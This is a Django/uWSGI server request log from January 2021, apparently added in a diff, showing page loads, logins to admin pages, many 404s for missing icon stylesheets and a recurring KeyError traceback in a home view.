2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 343/451] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 344/452] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:12 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 345/453] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 346/454] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 347/455] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 28 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 348/456] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 349/457] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 350/458] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:12 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 351/459] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:55:13 2021] GET /announcement => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 352/460] 219.228.146.146 () {40 vars in 907 bytes} [Thu Jan 14 07:55:14 2021] GET /announcement/ => generated 8247 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 353/461] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 354/462] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 355/463] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 356/464] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 357/465] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 358/466] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 359/467] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 360/468] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:14 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 361/469] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:14 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 2069|app: 0|req: 362/470] 42.236.10.117 () {38 vars in 845 bytes} [Thu Jan 14 07:55:14 2021] GET /home/ => generated 58375 bytes in 64 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 363/471] 219.228.146.146 () {40 vars in 903 bytes} [Thu Jan 14 07:55:17 2021] GET /admin-home/ => generated 6515 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 364/472] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 365/473] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 366/474] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 367/475] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 368/476] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 369/477] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 370/478] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 371/479] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:17 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 372/480] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:17 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 373/481] 42.236.10.78 () {34 vars in 792 bytes} [Thu Jan 14 07:55:17 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 374/482] 219.228.146.146 () {40 vars in 903 bytes} [Thu Jan 14 07:55:19 2021] GET /kind-manage/ => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 375/483] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 376/484] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 377/485] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 378/486] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 379/487] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 380/488] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 25 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 381/489] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 382/490] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:19 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 383/491] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:19 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 384/492] 42.236.10.84 () {40 vars in 878 bytes} [Thu Jan 14 07:55:24 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[] +[pid: 2069|app: 0|req: 385/493] 219.228.146.146 () {40 vars in 898 bytes} [Thu Jan 14 07:55:25 2021] GET /all-1-0-0 => generated 8287 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 386/494] 42.236.10.78 () {38 vars in 847 bytes} [Thu Jan 14 07:55:27 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 387/495] 219.228.146.146 () {40 vars in 889 bytes} [Thu Jan 14 07:55:27 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 388/496] 42.236.10.117 () {34 vars in 791 bytes} [Thu Jan 14 07:55:30 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/497] 42.236.10.78 () {40 vars in 942 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/498] 42.236.10.75 () {40 vars in 919 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/499] 42.236.10.75 () {40 vars in 923 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/500] 42.236.10.78 () {40 vars in 922 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/501] 42.236.10.93 () {40 vars in 927 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/502] 42.236.10.75 () {40 vars in 903 bytes} [Thu Jan 14 07:55:31 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/503] 42.236.10.78 () {40 vars in 901 bytes} [Thu Jan 14 07:55:31 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/504] 42.236.10.78 () {40 vars in 919 bytes} [Thu Jan 14 07:55:31 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/505] 42.236.10.75 () {40 vars in 916 bytes} [Thu Jan 14 07:55:32 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/506] 42.236.10.75 () {40 vars in 908 bytes} [Thu Jan 14 07:55:32 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 389/507] 42.236.10.117 () {40 vars in 877 bytes} [Thu Jan 14 07:55:33 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 390/508] 219.228.146.146 () {48 vars in 969 bytes} [Thu Jan 14 07:55:33 2021] POST /login/ => generated 27 bytes in 28 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 391/509] 219.228.146.146 () {40 vars in 884 bytes} [Thu Jan 14 07:55:33 2021] GET /home/ => generated 7943 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/510] 42.236.10.84 () {40 vars in 963 bytes} [Thu Jan 14 07:55:35 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/511] 42.236.10.78 () {40 vars in 968 bytes} [Thu Jan 14 07:55:35 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 2069|app: 0|req: 392/512] 42.236.10.117 () {38 vars in 845 bytes} [Thu Jan 14 07:55:35 2021] GET /home/ => generated 58375 bytes in 69 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/513] 42.236.10.75 () {28 vars in 447 bytes} [Thu Jan 14 07:55:39 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: 0|req: 393/514] 114.87.230.234 () {40 vars in 919 bytes} [Thu Jan 14 07:55:55 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 2069|app: 0|req: 394/515] 114.87.230.234 () {38 vars in 807 bytes} [Thu Jan 14 07:55:55 2021] GET /favicon.ico => generated 3480 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 395/516] 219.228.146.146 () {38 vars in 836 bytes} [Thu Jan 14 07:55:59 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 396/517] 114.87.230.234 () {48 vars in 1017 bytes} [Thu Jan 14 07:56:00 2021] POST /my-admin/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 397/518] 114.87.230.234 () {40 vars in 927 bytes} [Thu Jan 14 07:56:00 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 398/519] 114.87.230.234 () {38 vars in 897 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 399/520] 114.87.230.234 () {38 vars in 885 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 400/521] 114.87.230.234 () {38 vars in 853 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 401/522] 114.87.230.234 () {38 vars in 873 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 402/523] 114.87.230.234 () {38 vars in 889 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 403/524] 114.87.230.234 () {38 vars in 873 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 404/525] 114.87.230.234 () {38 vars in 929 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 405/526] 114.87.230.234 () {38 vars in 821 bytes} [Thu Jan 14 07:56:00 2021] GET /static/css/spinners.css => generated 3516 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 406/527] 219.228.146.146 () {48 vars in 969 bytes} [Thu Jan 14 07:56:05 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 407/528] 219.228.146.146 () {40 vars in 884 bytes} [Thu Jan 14 07:56:05 2021] GET /home/ => generated 7946 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 408/529] 219.228.146.146 () {38 vars in 836 bytes} [Thu Jan 14 07:56:16 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 409/530] 219.228.146.146 () {40 vars in 892 bytes} [Thu Jan 14 07:56:18 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 410/531] 219.228.146.146 () {48 vars in 978 bytes} [Thu Jan 14 07:56:27 2021] POST /my-admin/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 411/532] 219.228.146.146 () {40 vars in 897 bytes} [Thu Jan 14 07:56:27 2021] GET /admin-home/ => generated 6515 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 412/533] 219.228.146.146 () {38 vars in 844 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 413/534] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 414/535] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 416/536] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 417/537] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 417/538] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:56:27 2021] GET /static/css/spinners.css => generated 3516 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 418/539] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:28 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 419/540] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:56:28 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 420/541] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:56:28 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 421/542] 219.228.146.146 () {40 vars in 902 bytes} [Thu Jan 14 07:56:30 2021] GET /kind-manage/ => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 422/543] 219.228.146.146 () {38 vars in 845 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 423/544] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 425/545] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 426/546] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:56:30 2021] GET 